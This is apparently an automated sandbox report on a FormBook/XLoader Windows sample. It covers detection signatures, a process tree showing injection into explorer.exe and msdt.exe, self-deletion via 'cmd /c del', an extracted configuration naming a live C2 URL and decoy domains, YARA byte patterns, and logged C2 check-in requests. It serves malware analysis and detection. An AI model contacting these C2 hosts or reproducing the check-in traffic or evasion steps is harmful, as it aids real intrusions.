Loading ...

Play interactive tourEdit tour

Windows Analysis Report HkE0tD0g4NXKJfy.exe

Overview

General Information

Sample Name:HkE0tD0g4NXKJfy.exe
Analysis ID:528615
MD5:fcc2d1cda8d3989feca9c5f5f900e164
SHA1:075de723df172cc93c537d5472ad8025f192ddc8
SHA256:77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HkE0tD0g4NXKJfy.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
    • HkE0tD0g4NXKJfy.exe (PID: 3336 cmdline: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5904 cmdline: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5960

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.platinumcredit.net
          Source: C:\Windows\explorer.exeDomain query: www.thefullfledged.com
          Source: C:\Windows\explorer.exeDomain query: www.jakital.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
          Source: C:\Windows\explorer.exeDomain query: www.xcgtsret.com
          Source: C:\Windows\explorer.exeDomain query: www.suepersoldiers.com
          Source: C:\Windows\explorer.exeDomain query: www.arsels.info
          Source: C:\Windows\explorer.exeDomain query: www.electricatrick.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.219 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.204.216.132 80
          Source: C:\Windows\explorer.exeDomain query: www.151motors.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.platinumcredit.net/sh5d/
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1Host: www.arsels.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1Host: www.electricatrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1Host: www.vupeliquid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.219 103.224.212.219
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be73d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:10:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/
          Source: msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G
          Source: unknownDNS traffic detected: queries for: www.platinumcredit.net
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
